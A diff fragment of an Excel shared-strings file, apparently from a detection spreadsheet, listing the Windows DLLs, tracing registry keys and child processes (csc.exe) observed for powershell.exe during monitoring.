+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows COM interface for WinHttp - C:\Windows\System32\winhttpcom.dll
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Registry object added or deleted (rule: RegistryEvent) by powershell.exe
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Registry value set (rule: RegistryEvent) by powershell.exe
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\ConsoleTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableAutoFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableConsoleTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\EnableFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileDirectory
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\FileTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32\MaxFileSize
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\ConsoleTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableAutoFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableConsoleTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\EnableFileTracing
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileDirectory
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\FileTracingMask
+HKLM\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS\MaxFileSize</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Windows HTTP Services - C:\Windows\System32\winhttp.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+Remote Access API - C:\Windows\System32\rasapi32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe laods additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+Remote Access API - C:\Windows\System32\rasapi32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Powershell.exe loads additional modules:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\d53f84c7624fb9b2b17bbad0a38644f8\System.Configuration.Install.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\b4a348f448f7da786d8f78e76bbb28a0\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access API - C:\Windows\System32\rasapi32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access Connection Manager - C:\Windows\System32\rasman.dl</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">l
+Routing Utilities - C:\Windows\System32\rtutils.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Group Policy Client API - C:\Windows\System32\gpapi.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
+Windows cryptographic library - C:\Windows\System32\ncrypt.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+Security Support Provider Interface - C:\Windows\System32\security.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Credential Delegation Security Package - C:\Windows\System32\credssp.dll
+Web Transfer Protocols API - C:\Windows\System32\webio.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Winsock2 Helper DLL (TL/IPv6) - C:\Windows\System32\wship6.dll
+Winsock2 Helper DLL (TL/IPv4) - C:\Windows\System32\WSHTCPIP.DLL
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Routing Utilities - C:\Windows\System32\rtutils.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+Remote Access API - C:\Windows\System32\rasapi32.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>System.Configuration.dll - C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Configuration\a2571a4e32a586b52463d88a83702aed\System.Configuration.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Remote Access API - C:\Windows\System32\rasapi32.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Remote Access Connection Manager - C:\Windows\System32\rasman.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">Routing Utilities - C:\Windows\System32\rtutils.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll</t>
+    </r>
+  </si>
+  <si>
+    <t xml:space="preserve">Child: Powershell.exe
+Parent: Powershell.exe
+Child: csc.exe 
